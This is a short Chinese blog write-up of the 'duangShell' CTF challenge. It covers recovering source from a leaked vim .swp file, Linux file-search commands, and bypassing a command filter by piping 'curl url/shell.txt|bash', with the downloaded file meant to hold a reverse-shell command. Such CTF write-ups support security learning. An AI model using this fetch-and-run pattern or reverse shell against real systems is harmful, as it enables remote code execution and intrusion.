[BJDCTF 2nd]duangShell

作者: const27 分类: All,RCE,杂七杂八的安全问题 发布时间: 2020-06-06 15:10

知识点: .swp文件泄露,RCE,Linux的找文件命令

.swp泄露

vim编辑一个文件产生的临时文件,处理不当有可能造成泄露。其泄露方式为
文件名.swp 有些时候文件名前会有一个点.。然后获得这个.swp文件后,在Linux里通过命令 vim -r xxx.swp 来让临时文件恢复正常

Linux的找文件相关的命令

find / -name 文件名
locate 文件名
whereis 文件名

本题的RCE绕过

通过 curl url获得某个网址的某个文件的内容,再通过管道符转移给bash处理,如:
curl url/shell.txt|bash shell.txt里是要执行的命令,本题建议在shell.txt里放反弹shell指令

进来后发现提示,输入路径 .index.php.swp得到index.php的临时文件,再通过vim -r .index.php.swp还原,得到源码:

过滤了十分多的东西.那么就用刚刚提到的curl url |bash 的方法getshell吧。
getshell后 再通过find / -name flag 得到flag。(flag藏得很深,不用find的话根本不可能找到)

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

6 + 17 =

标签云